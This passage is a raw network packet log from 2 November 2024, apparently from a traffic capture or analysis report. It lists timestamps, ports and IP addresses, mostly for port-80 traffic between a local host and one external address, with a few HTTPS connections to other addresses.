Nov 2, 2024 17:57:00.484392881 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.484405994 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.484417915 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.484426022 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.484450102 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.484460115 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.484678984 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.484693050 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.484735966 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.484747887 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.484853983 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.484865904 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.484879017 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.484890938 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.484894991 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.484916925 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.484956980 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.485086918 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.485099077 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.485111952 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.485125065 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.485137939 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.485140085 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.485152960 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.485168934 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.485181093 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.485209942 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.485378027 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.485423088 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.485526085 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.485538960 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.485552073 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.485562086 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.485565901 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.485575914 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.485579014 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.485598087 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.485605955 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.485610962 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.485624075 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.485625029 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.485631943 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.485637903 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.485650063 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.485662937 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.485676050 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.485690117 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.485690117 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.485707998 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.485728979 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.486402035 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.486414909 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.486426115 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.486439943 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.486453056 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.486464024 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.486464977 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.486474991 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.486476898 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.486489058 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.486499071 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.486501932 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.486515045 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.486519098 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.486527920 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.486541033 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.486550093 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.486664057 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.515434980 CET	443	50014	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.515527010 CET	443	50014	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.515568018 CET	50014	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.515590906 CET	443	50014	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.515605927 CET	443	50014	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.515651941 CET	50014	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.515779972 CET	50014	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.515793085 CET	443	50014	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.515803099 CET	50014	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.515809059 CET	443	50014	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.519052029 CET	50021	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.519083977 CET	443	50021	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.519171953 CET	50021	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.519321918 CET	50021	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.519335032 CET	443	50021	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.529900074 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.529966116 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.529967070 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.529980898 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.530002117 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.530033112 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.530041933 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.530206919 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.559300900 CET	443	50015	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.559372902 CET	443	50015	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.559487104 CET	50015	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.559570074 CET	50015	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.559583902 CET	443	50015	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.559592962 CET	50015	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.559597969 CET	443	50015	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.562100887 CET	50022	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.562133074 CET	443	50022	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.562392950 CET	50022	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.562717915 CET	50022	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.562731981 CET	443	50022	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.602477074 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.602529049 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.602539062 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.602541924 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.602571964 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.602581978 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.602582932 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.602615118 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.602663994 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.602677107 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.602715015 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.602746964 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.602790117 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.602829933 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.602910042 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.602920055 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.602931023 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.602950096 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.602957010 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.602984905 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.603040934 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.603080988 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.603167057 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.603177071 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.603193045 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.603205919 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.603216887 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.603218079 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.603230000 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.603235960 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.603261948 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.603272915 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.603435993 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.603446960 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.603465080 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.603476048 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.603477001 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.603486061 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.603497982 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.603506088 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.603519917 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.603543997 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.603720903 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.603730917 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.603737116 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.603749037 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.603760958 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.603766918 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.603794098 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.603802919 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.604087114 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604099035 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604114056 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604125977 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604136944 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.604137897 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604151964 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604162931 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604175091 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604176998 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.604199886 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.604208946 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.604454994 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604465961 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604480028 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604491949 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604500055 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.604504108 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604520082 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.604547024 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.604738951 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604757071 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604768038 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604779005 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604790926 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604799986 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.604803085 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604815006 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604825020 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.604829073 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604841948 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604851961 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.604854107 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.604876041 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.604888916 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.605467081 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.605478048 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.605492115 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.605504036 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.605515957 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.605525017 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.605528116 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.605540037 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.605551958 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.605554104 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.605566025 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.605572939 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.605577946 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.605590105 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.605601072 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.605612993 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.605621099 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.605628967 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.605642080 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.605643988 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.605671883 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.605700970 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.606205940 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.606218100 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.606268883 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.643188953 CET	443	50011	20.190.159.4	192.168.2.7
Nov 2, 2024 17:57:00.643666029 CET	50011	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:57:00.643686056 CET	443	50011	20.190.159.4	192.168.2.7
Nov 2, 2024 17:57:00.644381046 CET	50011	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:57:00.644387007 CET	443	50011	20.190.159.4	192.168.2.7
Nov 2, 2024 17:57:00.644454956 CET	50011	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:57:00.644464970 CET	443	50011	20.190.159.4	192.168.2.7
Nov 2, 2024 17:57:00.649152994 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.649204016 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.649215937 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.649224043 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.649245977 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.649261951 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.649337053 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.649347067 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.649378061 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.649386883 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.721642017 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.721715927 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.721728086 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.721729040 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.721749067 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.721771002 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.721781969 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.721795082 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.721839905 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.721869946 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.721884012 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.721910000 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.721929073 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.721940994 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.721992016 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.722022057 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722033978 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722044945 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722058058 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722064018 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.722069979 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722085953 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.722099066 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.722116947 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.722182035 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722193956 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722224951 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.722235918 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722245932 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722258091 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722284079 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.722295046 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.722387075 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722399950 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722410917 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722431898 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.722446918 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.722513914 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722526073 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722537041 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722551107 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722557068 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.722573042 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.722594976 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.722649097 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722661018 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722680092 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.722698927 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.722789049 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722801924 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722814083 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722827911 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722841024 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.722860098 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.722872019 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.722872019 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.723018885 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723031998 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723042965 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723057032 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723073006 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.723093033 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.723165989 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723182917 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723227978 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.723258972 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723268986 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723278999 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723285913 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723292112 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723304033 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723339081 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.723356009 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.723514080 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723526955 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723532915 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723542929 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723553896 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723566055 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.723567009 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723591089 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.723591089 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.723620892 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.723752022 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723762035 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723773003 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723784924 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723797083 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723799944 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.723809958 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723819017 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.723839045 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.723867893 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.723972082 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.723989010 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.724003077 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.724030972 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.724044085 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.724235058 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.724251986 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.724265099 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.724273920 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.724282980 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.724286079 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.724292994 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.724298000 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.724311113 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.724311113 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.724323988 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.724334955 CET	80	49933	62.204.41.163	192.168.2.7
